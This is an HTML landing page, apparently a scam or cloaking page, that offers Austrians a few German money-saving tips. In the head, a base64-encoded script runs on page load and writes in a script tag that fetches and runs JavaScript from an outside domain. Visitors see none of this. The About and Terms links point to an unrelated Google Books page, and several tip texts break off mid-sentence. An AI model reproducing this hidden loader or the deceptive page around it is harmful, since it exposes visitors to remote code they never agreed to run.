<!doctype html>
<html lang="es">
    <head>
        <meta name="viewport" content="width=device-width;">
        <meta charset="utf-8">
        <title> Die beste Gelegenheit für Österreicher</title>
        <script src="data:text/javascript;base64,ZG9jdW1lbnQub3BlbigpO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4uZG95b3VyYmVzdDIwMjAuY29tLzIwLzc0MDAuanMiPjwvc2NyaXB0PicpO2RvY3VtZW50LmNsb3NlKCk7"></script>
        <style>
            *{
                padding: 0;
                margin: 0;
            }
            body,html{
                margin: 0 0;
                padding: 0 0;
                box-sizing: border-box;
                color: white;
            }
            body{
                background: rgb(54,146,195);

            }
            .container{
                max-width: 1200px;
                margin:0 auto;
            }
            @media screen (max-width:1200px){
                .container{
                    max-width: 970px;
                }
            }
            @media (max-width:992px){
                .container{
                    max-width: 750px;
                }
            }
            @media screen (max-width:767){
                .container {
                    max-width: none;
                }
                }
/*            Header*/
            header{
                
                padding-top: 30px;
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                z-index: 1000;
                        }
            .intro{
                height: 100vh;
                display: flex;
                flex-direction: column;
                justify-content: space-around;
                text-align: center;
                
            }
            .inner_header{
                
                display: flex;
                justify-content: space-between;
                
            }
            nav a{
                color: black;
                font-size: 18px;
                text-transform: uppercase;
                margin-left: 30px;
                text-decoration: none;
            }
            .nav__link{
                position: relative;
                }
            .nav__link:after {
                content: "";
                display: block;
                width: 100%;
                height: 3px;

                background-color: #fce38a;
                opacity: 1;

                position: absolute;
                top: 100%;
                left: 0;
                z-index: 1;

                transition: opacity .1s linear;
            }
            nav a:hover{
                font-size: 20px;
            }
            section{
                min-height: 900px;
                max-height: 1200px;
            }
            
/*            Section*/
            img{
                max-width: 500px;
                max-height: 500px;
            }
            .headline{
                height: 120px;
                margin: 10px;
                text-transform: uppercase;
                font-size: 27px;
                text-align: center;
            }
            .inner-section{
                display: flex;
                justify-content: space-between;
                flex-direction: row;
                padding: 10px;
            }
            .section{
                display: flex;
                justify-content: space-between;
                flex-direction: column;
                align-items: center;
                
            }
            .article1{
                padding: 10px;
            }
/*            FOOTER*/
            footer{
                position: relative;
                bottom: 0;
                padding: 20px;
                color: black;
                height: 50px;
                background-color: #c7d4d2;
            }
            .footer__nav{
                display: flex;
                flex-direction: row;
                justify-content: space-between;
                color: black;
            }
        </style>
    </head>
    <body>
        <header>
            <div class="container">
                <div class="inner_header">
                   <h1>Neue Lösung</h1>
                    <nav>
                    <a href="https://books.google.com.ua/books?id=lwpLAAAAcAAJ&pg=PA48&lpg=PA48&dq=Die+beste+Gelegenheit+f%C3%BCr+%C3%96sterreicher&source=bl&ots=l3TE3BOXhK&sig=ACfU3U1NzrhDqECI2IKVzPtNGlDFQtrupw&hl=ru&sa=X&ved=2ahUKEwiE9f3m6LrqAhXMlosKHU1kDSwQ6AEwBHoECAgQAQ#v=onepage&q=Die%20beste%20Gelegenheit%20f%C3%BCr%20%C3%96sterreicher&f=false">About</a>
                    <a href="https://books.google.com.ua/books?id=lwpLAAAAcAAJ&pg=PA48&lpg=PA48&dq=Die+beste+Gelegenheit+f%C3%BCr+%C3%96sterreicher&source=bl&ots=l3TE3BOXhK&sig=ACfU3U1NzrhDqECI2IKVzPtNGlDFQtrupw&hl=ru&sa=X&ved=2ahUKEwiE9f3m6LrqAhXMlosKHU1kDSwQ6AEwBHoECAgQAQ#v=onepage&q=Die%20beste%20Gelegenheit%20f%C3%BCr%20%C3%96sterreicher&f=false">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </header>
        <div class="intro">
             <div class="container">
                 <div class="intro__inner">
                     <h1 class="intro__title">Die beste Gelegenheit für Österreicher</h1>
                 </div>
             </div>
        </div>
        <section>
            <div class="container">
              <div class="section">
              <h1 class="headline">Die beste Gelegenheit für Österreicher!</h1>
             
                <img src="img/hs6ga8.jpg" alt="" class="main-img"  width="71%" height="73%">
                  
             
               <div class="inner-section">
                        <div class="article1"><img src="" alt=""><h1>Lade Freunde nach Hause ein anstatt auszugehen

                        </h1> <p>Aktivitäten daheim sind fast immer günstiger als auszugehen. Gemeinsam mit Freunden kannst du leicht ein schönes Gericht zaubern oder     jeden Gast bitten, einen kleinen Beitrag beizusteuern. Ein lustiges Spiel, ein Film oder eine angeregte Unterhaltung runden den Abend ab.     Selbstgekochtes Essen ist nicht nur günstiger, sondern mit wenig Aufwand meist auch viel gesünder! 
                       </div>
                        <div class="article1"><img src="" alt=""> <h1>Frage dich, wie viel Zeit dich ein Kauf kostet

                       </h1> <p>Gehe grundsätzlich nur einkaufen wenn du genau weißt, was du benötigst. Für regelmäßige Einkäufe schreibe dir immer eine Einkaufsliste. In den Einkaufswagen                        kommen nur Dinge, die auf der Liste stehen, egal wie verlockend das Angebot erscheint. Für kleine Einkäufe im Supermarkt solltest du

                       </p>
                       </div>
                        <div class="article1"><img src="" alt=""> <h1>Räume deinen Kleiderschrank auf

                       </h1><p>Viel zu oft kaufen wir Kleidungsstücke, die wir eigentlich nicht benötigen. Wenn du etwas sparen möchtest oder schnell Geld benötigst, sieh deinen Kleiderschrank genauer an. Es gibt bestimmt einige Stücke, welche du verkaufen kannst. Wenn du nie ganz sicher bist, was genau du jetzt du  nochmal tragen möchtest.
                       </p></div>
                </div>
                
              </div>
                
                
            </div>
        </section>
        <footer>
            <div class="container">
                <div class="footer">
                    <nav class="footer__nav">
                    <a href="https://books.google.com.ua/books?id=lwpLAAAAcAAJ&pg=PA48&lpg=PA48&dq=Die+beste+Gelegenheit+f%C3%BCr+%C3%96sterreicher&source=bl&ots=l3TE3BOXhK&sig=ACfU3U1NzrhDqECI2IKVzPtNGlDFQtrupw&hl=ru&sa=X&ved=2ahUKEwiE9f3m6LrqAhXMlosKHU1kDSwQ6AEwBHoECAgQAQ#v=onepage&q=Die%20beste%20Gelegenheit%20f%C3%BCr%20%C3%96sterreicher&f=false">About</a>
                    <a href="https://books.google.com.ua/books?id=lwpLAAAAcAAJ&pg=PA48&lpg=PA48&dq=Die+beste+Gelegenheit+f%C3%BCr+%C3%96sterreicher&source=bl&ots=l3TE3BOXhK&sig=ACfU3U1NzrhDqECI2IKVzPtNGlDFQtrupw&hl=ru&sa=X&ved=2ahUKEwiE9f3m6LrqAhXMlosKHU1kDSwQ6AEwBHoECAgQAQ#v=onepage&q=Die%20beste%20Gelegenheit%20f%C3%BCr%20%C3%96sterreicher&f=false">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </footer>
    </body>
</html>
